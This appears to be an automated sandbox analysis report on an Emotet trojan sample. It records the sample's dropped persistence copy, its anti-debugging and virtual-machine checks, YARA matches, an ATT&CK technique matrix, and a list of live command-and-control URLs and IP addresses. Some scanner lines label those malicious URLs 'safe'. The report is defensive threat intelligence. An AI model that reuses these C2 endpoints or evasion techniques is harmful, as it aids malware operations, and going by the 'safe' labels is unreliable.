              Source: C:\Users\user\Desktop\ExeFile (317).exeSection loaded: windows.fileexplorer.common.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (317).exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (317).exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (317).exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
              Source: ExeFile (317).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: ExeFile (317).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: ExeFile (317).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: ExeFile (317).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: ExeFile (317).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: ExeFile (317).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: ExeFile (317).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: A:\WindowsProcessManager-master\WindowsProcessManager-master\Release\TaskMgr.pdb source: ExeFile (317).exe
              Source: Binary string: vfwwdm32.pdb source: ExeFile (317).exe
              Source: ExeFile (317).exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: ExeFile (317).exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: ExeFile (317).exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: ExeFile (317).exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: ExeFile (317).exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_00415F77 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00415F77
              Source: ExeFile (317).exeStatic PE information: real checksum: 0x744f8 should be: 0x743e3
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_00411EC5 push ecx; ret 0_2_00411ED8
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_00625C50 push ecx; mov dword ptr [esp], 00008F8Eh0_2_00625C51
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_00625CF0 push ecx; mov dword ptr [esp], 00000E88h0_2_00625CF1
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_00625CD0 push ecx; mov dword ptr [esp], 0000A465h0_2_00625CD1
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_00625C90 push ecx; mov dword ptr [esp], 00002224h0_2_00625C91
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_00625D70 push ecx; mov dword ptr [esp], 0000B4A4h0_2_00625D71
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_00625D20 push ecx; mov dword ptr [esp], 0000C239h0_2_00625D21
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_00625DE0 push ecx; mov dword ptr [esp], 0000272Ah0_2_00625DE1
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_00625DB0 push ecx; mov dword ptr [esp], 00001190h0_2_00625DB1
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_00625E40 push ecx; mov dword ptr [esp], 0000C126h0_2_00625E41
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_00625EE0 push ecx; mov dword ptr [esp], 00006DE4h0_2_00625EE1
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_00625EA0 push ecx; mov dword ptr [esp], 00008285h0_2_00625EA1
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_00537A7E push ecx; mov dword ptr [esp], 00006DE4h0_2_00537A7F
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_0053786E push ecx; mov dword ptr [esp], 0000A465h0_2_0053786F
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_0053E015 push 0000003Bh; ret 0_2_0053E01A
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_00537A3E push ecx; mov dword ptr [esp], 00008285h0_2_00537A3F
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_0053782E push ecx; mov dword ptr [esp], 00002224h0_2_0053782F
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_0053788E push ecx; mov dword ptr [esp], 00000E88h0_2_0053788F
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_005378BE push ecx; mov dword ptr [esp], 0000C239h0_2_005378BF
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_0053794E push ecx; mov dword ptr [esp], 00001190h0_2_0053794F
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_0053797E push ecx; mov dword ptr [esp], 0000272Ah0_2_0053797F
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_0053790E push ecx; mov dword ptr [esp], 0000B4A4h0_2_0053790F
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_005379DE push ecx; mov dword ptr [esp], 0000C126h0_2_005379DF
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_005377EE push ecx; mov dword ptr [esp], 00008F8Eh0_2_005377EF
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCode function: 1_2_00411EC5 push ecx; ret 1_2_00411ED8
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCode function: 1_2_005E5C50 push ecx; mov dword ptr [esp], 00008F8Eh1_2_005E5C51
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCode function: 1_2_005E5CD0 push ecx; mov dword ptr [esp], 0000A465h1_2_005E5CD1
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCode function: 1_2_005E5CF0 push ecx; mov dword ptr [esp], 00000E88h1_2_005E5CF1
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCode function: 1_2_005E5C90 push ecx; mov dword ptr [esp], 00002224h1_2_005E5C91
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCode function: 1_2_005E5D70 push ecx; mov dword ptr [esp], 0000B4A4h1_2_005E5D71
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCode function: 1_2_005E5D20 push ecx; mov dword ptr [esp], 0000C239h1_2_005E5D21

              Persistence and Installation Behavior

              barindex
              Source: C:\Users\user\Desktop\ExeFile (317).exeExecutable created and started: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (317).exePE file moved: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Users\user\Desktop\ExeFile (317).exeFile opened: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exe:Zone.Identifier read attributes | deleteJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\ExeFile (317).exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-23298
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\ExeFile (317).exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_006238B0 GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,FindClose,0_2_006238B0
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCode function: 1_2_005E38B0 _snwprintf,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,FindClose,1_2_005E38B0
              Source: ExeFile (317).exe, 00000000.00000002.1675204691.00000000006C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
              Source: oleaut32.exe, 00000001.00000002.2928284379.00000000005FE000.00000004.00000020.00020000.00000000.sdmp, oleaut32.exe, 00000001.00000002.2928785476.0000000002993000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: oleaut32.exe, 00000001.00000002.2928785476.0000000002970000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
              Source: C:\Users\user\Desktop\ExeFile (317).exeAPI call chain: ExitProcess graph end nodegraph_0-23404
              Source: C:\Users\user\Desktop\ExeFile (317).exeAPI call chain: ExitProcess graph end nodegraph_0-23057
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeAPI call chain: ExitProcess graph end nodegraph_1-23200
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeAPI call chain: ExitProcess graph end nodegraph_1-23037
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_0040E930 LdrFindResource_U,LdrAccessResource,0_2_0040E930
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_00411C5F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00411C5F
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_00415F77 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00415F77
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_00624D00 mov eax, dword ptr fs:[00000030h]0_2_00624D00
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_00623E40 mov eax, dword ptr fs:[00000030h]0_2_00623E40
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_00530456 mov eax, dword ptr fs:[00000030h]0_2_00530456
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_00530C9F mov eax, dword ptr fs:[00000030h]0_2_00530C9F
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_0053689E mov eax, dword ptr fs:[00000030h]0_2_0053689E
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_005359DE mov eax, dword ptr fs:[00000030h]0_2_005359DE
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_00641030 mov eax, dword ptr fs:[00000030h]0_2_00641030
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCode function: 1_2_005E4D00 mov eax, dword ptr fs:[00000030h]1_2_005E4D00
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCode function: 1_2_005E3E40 mov eax, dword ptr fs:[00000030h]1_2_005E3E40
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCode function: 1_2_004F0456 mov eax, dword ptr fs:[00000030h]1_2_004F0456
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCode function: 1_2_004F0C9F mov eax, dword ptr fs:[00000030h]1_2_004F0C9F
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCode function: 1_2_004F689E mov eax, dword ptr fs:[00000030h]1_2_004F689E
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCode function: 1_2_004F59DE mov eax, dword ptr fs:[00000030h]1_2_004F59DE
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCode function: 1_2_020D1030 mov eax, dword ptr fs:[00000030h]1_2_020D1030
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_00623060 GetProcessHeap,RtlAllocateHeap,PathFindExtensionW,0_2_00623060
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_00411C5F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00411C5F
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_004100FB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004100FB
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_00413E30 SetUnhandledExceptionFilter,0_2_00413E30
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCode function: 1_2_00411C5F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00411C5F
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCode function: 1_2_004100FB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_004100FB
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCode function: 1_2_00413E30 SetUnhandledExceptionFilter,1_2_00413E30
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_00414640 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00414640
              Source: C:\Users\user\Desktop\ExeFile (317).exeCode function: 0_2_0040F510 GetUserNameW,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,CloseHandle,wsprintfW,_memset,OpenProcess,CloseHandle,wsprintfW,wsprintfW,Process32NextW,CloseHandle,0_2_0040F510
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeCode function: 1_2_005E52E0 RtlGetVersion,GetNativeSystemInfo,GetNativeSystemInfo,1_2_005E52E0
              Source: C:\Windows\SysWOW64\KBDOLDIT\oleaut32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 1.2.oleaut32.exe.4f279e.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ExeFile (317).exe.53279e.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ExeFile (317).exe.53279e.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ExeFile (317).exe.620000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.oleaut32.exe.4f279e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ExeFile (317).exe.53052e.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.oleaut32.exe.4f052e.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.oleaut32.exe.4f052e.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.ExeFile (317).exe.53052e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.oleaut32.exe.5e0000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1675028418.0000000000621000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2928201935.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1674963737.0000000000530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1675139231.0000000000644000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2928249226.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2928434199.00000000020D4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter
              2
              Windows Service
              1
              Access Token Manipulation
              12
              Masquerading
              OS Credential Dumping1
              System Time Discovery
              Remote Services11
              Archive Collected Data
              22
              Encrypted Channel
              Exfiltration Over Other Network Medium1
              Data Encrypted for Impact
              CredentialsDomainsDefault Accounts1
              Service Execution
              1
              DLL Side-Loading
              2
              Windows Service
              1
              Access Token Manipulation
              LSASS Memory21
              Security Software Discovery
              Remote Desktop ProtocolData from Removable Media1
              Non-Standard Port
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts11
              Native API
              Logon Script (Windows)1
              Process Injection
              1
              Process Injection
              Security Account Manager2
              Process Discovery
              SMB/Windows Admin SharesData from Network Shared Drive1
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
              DLL Side-Loading
              1
              Hidden Files and Directories
              NTDS1
              Account Discovery
              Distributed Component Object ModelInput Capture112
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Obfuscated Files or Information
              LSA Secrets1
              System Owner/User Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials2
              File and Directory Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              File Deletion
              DCSync15
              System Information Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              ExeFile (317).exe92%ReversingLabsWin32.Trojan.Emotet
              ExeFile (317).exe100%AviraHEUR/AGEN.1318091
              ExeFile (317).exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://157.245.99.39:8080/vBtfrqns/0%Avira URL Cloudsafe
              http://94.23.216.33/FJlVHXJ3dGgmVB/80%Avira URL Cloudsafe
              https://94.23.237.171:443/IBDjcvxbhNBv3Y/nqDclyv1OKh853Z8d/c8YC/0%Avira URL Cloudsafe
              http://120.138.30.150:8080/XM2S/YtKcHIPmeYw/zztkv5g94Hw7/wVekA0ARv8Buud2oB0A/Jr6A//h0%Avira URL Cloudsafe
              http://137.59.187.107:8080/wzgMAgU4yK/hQXJ38hJBg9WpF6jbBc/gW3V6lKMdT6RlX5g/E0%Avira URL Cloudsafe
              http://157.245.99.39:8080/vBtfrqns/b0%Avira URL Cloudsafe
              http://156.155.166.221/Bv1B9ylSi3H6NCCiJn/t8krQUl7Omx/4yDaS/HAGZlQasHt6y1VO9/UZSvyEhhdIu8Ap/0%Avira URL Cloudsafe
              http://134.209.36.254:8080/Jg04eNfDVrhItWur/0%Avira URL Cloudsafe
              http://137.59.187.107:8080/wzgMAgU4yK/hQXJ38hJBg9WpF6jbBc/gW3V6lKMdT6RlX5g/0%Avira URL Cloudsafe
              http://120.138.30.150:8080/XM2S/YtKcHIPmeYw/zztkv5g94Hw7/wVekA0ARv8Buud2oB0A/Jr6A/K8A/0%Avira URL Cloudsafe
              http://94.23.216.33/FJlVHXJ3dGgmVB/0%Avira URL Cloudsafe
              http://71.72.196.159/aoKx6lT2Eqq9moIppG/ExQB/6Redr3THd8vjzdN/FzfGJ5z/btYoJOlmO4gRopK8A/0%Avira URL Cloudsafe
              http://120.138.30.150:8080/XM2S/YtKcHIPmeYw/zztkv5g94Hw7/wVekA0ARv8Buud2oB0A/Jr6A/0%Avira URL Cloudsafe
              http://157.245.99.39:8080/vBtfrqns/&0%Avira URL Cloudsafe
              http://120.138.30.150:8080/XM2S/YtKcHIPmeYw/zztkv5g94Hw7/wVekA0ARv8Buud2oB0A/Jr6A/)0%Avira URL Cloudsafe
              http://156.155.166.221/Bv1B9ylSi3H6NCCiJn/t8krQUl7Omx/4yDaS/HAGZlQasHt6y1VO9/UZSvyEhhdIu8Ap/ET0%Avira URL Cloudsafe
              http://120.138.30.150:8080/XM2S/YtKcHIPmeYw/zztkv5g94Hw7/wVekA0ARv8Buud2oB0A/Jr6A/70%Avira URL Cloudsafe
              http://156.155.166.221/Bv1B9ylSi3H6NCCiJn/t8krQUl7Omx/4yDaS/HAGZlQasHt6y1VO9/UZSvyEhhdIu8Ap//0%Avira URL Cloudsafe
              http://120.138.30.150:8080/XM2S/YtKcHIPmeYw/zztkv5g94Hw7/wVekA0ARv8Buud2oB0A/Jr6A/K8A/L0%Avira URL Cloudsafe
              https://61.19.246.238:443/yATH/0%Avira URL Cloudsafe
              No contacted domains info
              NameMaliciousAntivirus DetectionReputation
              http://157.245.99.39:8080/vBtfrqns/true
              • Avira URL Cloud: safe
              unknown
              http://137.59.187.107:8080/wzgMAgU4yK/hQXJ38hJBg9WpF6jbBc/gW3V6lKMdT6RlX5g/true
              • Avira URL Cloud: safe
              unknown
              http://134.209.36.254:8080/Jg04eNfDVrhItWur/true
              • Avira URL Cloud: safe
              unknown
              https://94.23.237.171:443/IBDjcvxbhNBv3Y/nqDclyv1OKh853Z8d/c8YC/true
              • Avira URL Cloud: safe
              unknown
              http://156.155.166.221/Bv1B9ylSi3H6NCCiJn/t8krQUl7Omx/4yDaS/HAGZlQasHt6y1VO9/UZSvyEhhdIu8Ap/true
              • Avira URL Cloud: safe
              unknown
              http://120.138.30.150:8080/XM2S/YtKcHIPmeYw/zztkv5g94Hw7/wVekA0ARv8Buud2oB0A/Jr6A/true
              • Avira URL Cloud: safe
              unknown
              http://71.72.196.159/aoKx6lT2Eqq9moIppG/ExQB/6Redr3THd8vjzdN/FzfGJ5z/btYoJOlmO4gRopK8A/true
              • Avira URL Cloud: safe
              unknown
              http://94.23.216.33/FJlVHXJ3dGgmVB/true
              • Avira URL Cloud: safe
              unknown
              https://61.19.246.238:443/yATH/true
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://157.245.99.39:8080/vBtfrqns/boleaut32.exe, 00000001.00000002.2928785476.0000000002993000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://137.59.187.107:8080/wzgMAgU4yK/hQXJ38hJBg9WpF6jbBc/gW3V6lKMdT6RlX5g/Eoleaut32.exe, 00000001.00000002.2928785476.0000000002993000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://120.138.30.150:8080/XM2S/YtKcHIPmeYw/zztkv5g94Hw7/wVekA0ARv8Buud2oB0A/Jr6A/K8A/oleaut32.exe, 00000001.00000002.2928284379.00000000005FE000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://94.23.216.33/FJlVHXJ3dGgmVB/8oleaut32.exe, 00000001.00000002.2928785476.0000000002993000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://120.138.30.150:8080/XM2S/YtKcHIPmeYw/zztkv5g94Hw7/wVekA0ARv8Buud2oB0A/Jr6A//holeaut32.exe, 00000001.00000002.2928284379.00000000005FE000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://157.245.99.39:8080/vBtfrqns/&oleaut32.exe, 00000001.00000002.2928785476.0000000002993000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://120.138.30.150:8080/XM2S/YtKcHIPmeYw/zztkv5g94Hw7/wVekA0ARv8Buud2oB0A/Jr6A/7oleaut32.exe, 00000001.00000002.2928284379.00000000005FE000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://156.155.166.221/Bv1B9ylSi3H6NCCiJn/t8krQUl7Omx/4yDaS/HAGZlQasHt6y1VO9/UZSvyEhhdIu8Ap/EToleaut32.exe, 00000001.00000002.2928785476.0000000002993000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://120.138.30.150:8080/XM2S/YtKcHIPmeYw/zztkv5g94Hw7/wVekA0ARv8Buud2oB0A/Jr6A/)oleaut32.exe, 00000001.00000002.2928284379.00000000005FE000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://120.138.30.150:8080/XM2S/YtKcHIPmeYw/zztkv5g94Hw7/wVekA0ARv8Buud2oB0A/Jr6A/K8A/Loleaut32.exe, 00000001.00000002.2928284379.00000000005FE000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://156.155.166.221/Bv1B9ylSi3H6NCCiJn/t8krQUl7Omx/4yDaS/HAGZlQasHt6y1VO9/UZSvyEhhdIu8Ap//oleaut32.exe, 00000001.00000002.2928785476.0000000002993000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              94.200.114.161
              unknownUnited Arab Emirates
              15802DU-AS1AEtrue
              71.72.196.159
              unknownUnited States
              10796TWC-10796-MIDWESTUStrue
              85.152.162.105
              unknownSpain
              12946TELECABLESpainEStrue
              174.102.48.180
              unknownUnited States
              10796TWC-10796-MIDWESTUStrue
              169.239.182.217
              unknownSouth Africa
              37153xneeloZAtrue
              200.123.150.89
              unknownArgentina
              16814NSSSAARtrue
              220.245.198.194
              unknownAustralia
              7545TPG-INTERNET-APTPGTelecomLimitedAUtrue
              104.131.11.150
              unknownUnited States
              14061DIGITALOCEAN-ASNUStrue
              176.111.60.55
              unknownUkraine
              24703UN-UKRAINE-ASKievUkraineUAtrue
              94.23.237.171
              unknownFrance
              16276OVHFRtrue
              187.161.206.24
              unknownMexico
